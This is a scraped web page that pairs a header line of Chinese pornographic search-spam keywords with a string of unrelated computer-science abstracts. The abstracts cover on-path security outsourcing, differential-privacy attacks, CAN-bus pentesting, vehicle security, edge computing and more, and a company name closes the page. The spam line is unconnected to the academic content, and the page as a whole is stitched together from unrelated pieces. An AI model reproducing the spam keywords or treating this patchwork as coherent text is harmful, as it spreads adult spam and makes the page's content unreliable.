亚洲男人的天堂2018av,欧美草比,久久久久久免费视频精选,国色天香在线看免费,久久久久亚洲av成人片仓井空

Security function outsourcing has witnessed both research and deployment in the recent years. While most existing services take a straight-forward approach of cloud hosting, on-path transit networks (such as ISPs) are increasingly more interested in offering outsourced security services to end users. Recent proposals (such as SafeBricks and mbTLS) have made it possible to outsource sensitive security applications to untrusted, arbitrary networks, rendering on-path security function outsourcing more promising than ever. However, to provide on-path security function outsourcing, there is one crucial component that is still missing -- a practical end-to-end network protocol. Thus, the discovery and orchestration of multiple capable and willing transit networks for user-requested security functions have only been assumed in many studies without any practical solutions. In this work, we propose Opsec, an end-to-end security-outsourcing protocol that fills this gap and brings us closer to the vision of on-path security function outsourcing. Opsec automatically discovers one or more transit ISPs between a client and a server, and requests user-specified security functions efficiently. When designing Opsec, we prioritize the practicality and applicability of this new end-to-end protocol in the current Internet. Our proof-of-concept implementation of Opsec for web sessions shows that an end user can easily start a new web session with a few clicks of a browser plug-in, to specify a series of security functions of her choice. We show that it is possible to implement such a new end-to-end service model in the current Internet for the majority of the web services without any major changes to the standard protocols (e.g., TCP, TLS, HTTP) and the existing network infrastructure (e.g., ISP's routing primitives).

相關內容

Differential privacy is among the most prominent techniques for preserving privacy of sensitive data, oweing to its robust mathematical guarantees and general applicability to a vast array of computations on data, including statistical analysis and machine learning. Previous work demonstrated that concrete implementations of differential privacy mechanisms are vulnerable to statistical attacks. This vulnerability is caused by the approximation of real values to floating point numbers. This paper presents a practical solution to the finite-precision floating point vulnerability, where the inverse transform sampling of the Laplace distribution can itself be inverted, thus enabling an attack where the original value can be retrieved with non-negligible advantage. The proposed solution has the advantages of being generalisable to any infinitely divisible probability distribution, and of simple implementation in modern architectures. Finally, the solution has been designed to make side channel attack infeasible, because of inherently exponential, in the size of the domain, brute force attacks.

Weakly supervised temporal action localization aims at learning the instance-level action pattern from the video-level labels, where a significant challenge is action-context confusion. To overcome this challenge, one recent work builds an action-click supervision framework. It requires similar annotation costs but can steadily improve the localization performance when compared to the conventional weakly supervised methods. In this paper, by revealing that the performance bottleneck of the existing approaches mainly comes from the background errors, we find that a stronger action localizer can be trained with labels on the background video frames rather than those on the action frames. To this end, we convert the action-click supervision to the background-click supervision and develop a novel method, called BackTAL. Specifically, BackTAL implements two-fold modeling on the background video frames, i.e. the position modeling and the feature modeling. In position modeling, we not only conduct supervised learning on the annotated video frames but also design a score separation module to enlarge the score differences between the potential action frames and backgrounds. In feature modeling, we propose an affinity module to measure frame-specific similarities among neighboring frames and dynamically attend to informative neighbors when calculating temporal convolution. Extensive experiments on three benchmarks are conducted, which demonstrate the high performance of the established BackTAL and the rationality of the proposed background-click supervision. Code is available at //github.com/VividLe/BackTAL.

Cache-coherent non-uniform memory access (ccNUMA) systems enable parallel applications to scale-up to thousands of cores and many terabytes of main memory. However, since remote accesses come at an increased cost, extra measures are necessitated to scale the applications to high core-counts and process far greater amounts of data than a typical server can hold. In a similar manner to how applications are optimized to improve cache utilization, applications also need to be optimized to improve data-locality on ccNUMA systems to use larger topologies effectively. The first step to optimizing an application is to understand what slows it down. Consequently, profiling tools, or manual instrumentation, are necessary to achieve this. When optimizing applications on large ccNUMA systems, however, there are limited mechanisms to capture and present actionable telemetry. This is partially driven by the proprietary nature of such interconnects, but also by the lack of development of a common and accessible (read open-source) framework that developers or vendors can leverage. In this paper, we present an open-source, extensible framework that captures high-rate on-chip events with low overhead (<10% single-core utilization). The presented framework can operate in live or record mode, allowing both real-time monitoring or capture for later post-workload or offline analysis. High-resolution visualization is available either through a standards-based (web) interactive graphical interface or through a convenient textual interface for quick-look analysis.

The Controller Area Network (CAN) is the most common protocol interconnecting the various control units of modern cars. Its vulnerabilities are somewhat known but we argue they are not yet fully explored -- although the protocol is obviously not secure by design, it remains to be thoroughly assessed how and to what extent it can be maliciously exploited. This manuscript describes the early steps towards a larger goal, that of integrating the various CAN pentesting activities together and carry them out holistically within an established pentesting environment such as the Metasploit Framework. In particular, we shall see how to build an exploit that upsets a simulated tachymeter running on a minimal Linux machine. While both portions are freely available from the authors' Github shares, the exploit is currently subject to a Metasploit pull request.

The increase in popularity of connected features in intelligent transportation systems, has led to a greater risk of cyber-attacks and subsequently, requires a more robust validation of cybersecurity in vehicle design. This article explores three such cyber-attacks and the weaknesses in the connected networks. A review is carried out on current vulnerabilities and key considerations for future vehicle design and validation are highlighted. This article addresses the vehicle manufactures desire to add unnecessary remote connections without appropriate security analysis and assessment of the risks involved. The modern vehicle is All Connected and only as strong as its weakest link.

A novel combination of two widely-used clustering algorithms is proposed here for the detection and reduction of high data density regions. The Density Based Spatial Clustering of Applications with Noise (DBSCAN) algorithm is used for the detection of high data density regions and the k-means algorithm for reduction. The proposed algorithm iterates while successively decrementing the DBSCAN search radius, allowing for an adaptive reduction factor based on the effective data density. The algorithm is demonstrated for a physics simulation application, where a surrogate model for fusion reactor plasma turbulence is generated with neural networks. A training dataset for the surrogate model is created with a quasilinear gyrokinetics code for turbulent transport calculations in fusion plasmas. The training set consists of model inputs derived from a repository of experimental measurements, meaning there is a potential risk of over-representing specific regions of this input parameter space. By applying the proposed reduction algorithm to this dataset, this study demonstrates that the training dataset can be reduced by a factor ~20 using the proposed algorithm, without a noticeable loss in the surrogate model accuracy. This reduction provides a novel way of analyzing existing high-dimensional datasets for biases and consequently reducing them, which lowers the cost of re-populating that parameter space with higher quality data.

This paper studies the single image super-resolution problem using adder neural networks (AdderNet). Compared with convolutional neural networks, AdderNet utilizing additions to calculate the output features thus avoid massive energy consumptions of conventional multiplications. However, it is very hard to directly inherit the existing success of AdderNet on large-scale image classification to the image super-resolution task due to the different calculation paradigm. Specifically, the adder operation cannot easily learn the identity mapping, which is essential for image processing tasks. In addition, the functionality of high-pass filters cannot be ensured by AdderNet. To this end, we thoroughly analyze the relationship between an adder operation and the identity mapping and insert shortcuts to enhance the performance of SR models using adder networks. Then, we develop a learnable power activation for adjusting the feature distribution and refining details. Experiments conducted on several benchmark models and datasets demonstrate that, our image super-resolution models using AdderNet can achieve comparable performance and visual quality to that of their CNN baselines with an about 2$\times$ reduction on the energy consumption.

In this paper, we present a comprehensive review of the imbalance problems in object detection. To analyze the problems in a systematic manner, we introduce a problem-based taxonomy. Following this taxonomy, we discuss each problem in depth and present a unifying yet critical perspective on the solutions in the literature. In addition, we identify major open issues regarding the existing imbalance problems as well as imbalance problems that have not been discussed before. Moreover, in order to keep our review up to date, we provide an accompanying webpage which catalogs papers addressing imbalance problems, according to our problem-based taxonomy. Researchers can track newer studies on this webpage available at: //github.com/kemaloksuz/ObjectDetectionImbalance .

Driven by the visions of Internet of Things and 5G communications, the edge computing systems integrate computing, storage and network resources at the edge of the network to provide computing infrastructure, enabling developers to quickly develop and deploy edge applications. Nowadays the edge computing systems have received widespread attention in both industry and academia. To explore new research opportunities and assist users in selecting suitable edge computing systems for specific applications, this survey paper provides a comprehensive overview of the existing edge computing systems and introduces representative projects. A comparison of open source tools is presented according to their applicability. Finally, we highlight energy efficiency and deep learning optimization of edge computing systems. Open issues for analyzing and designing an edge computing system are also studied in this survey.

In this study, we investigate the limits of the current state of the art AI system for detecting buffer overflows and compare it with current static analysis tools. To do so, we developed a code generator, s-bAbI, capable of producing an arbitrarily large number of code samples of controlled complexity. We found that the static analysis engines we examined have good precision, but poor recall on this dataset, except for a sound static analyzer that has good precision and recall. We found that the state of the art AI system, a memory network modeled after Choi et al. [1], can achieve similar performance to the static analysis engines, but requires an exhaustive amount of training data in order to do so. Our work points towards future approaches that may solve these problems; namely, using representations of code that can capture appropriate scope information and using deep learning methods that are able to perform arithmetic operations.

北京阿比特科技有限公司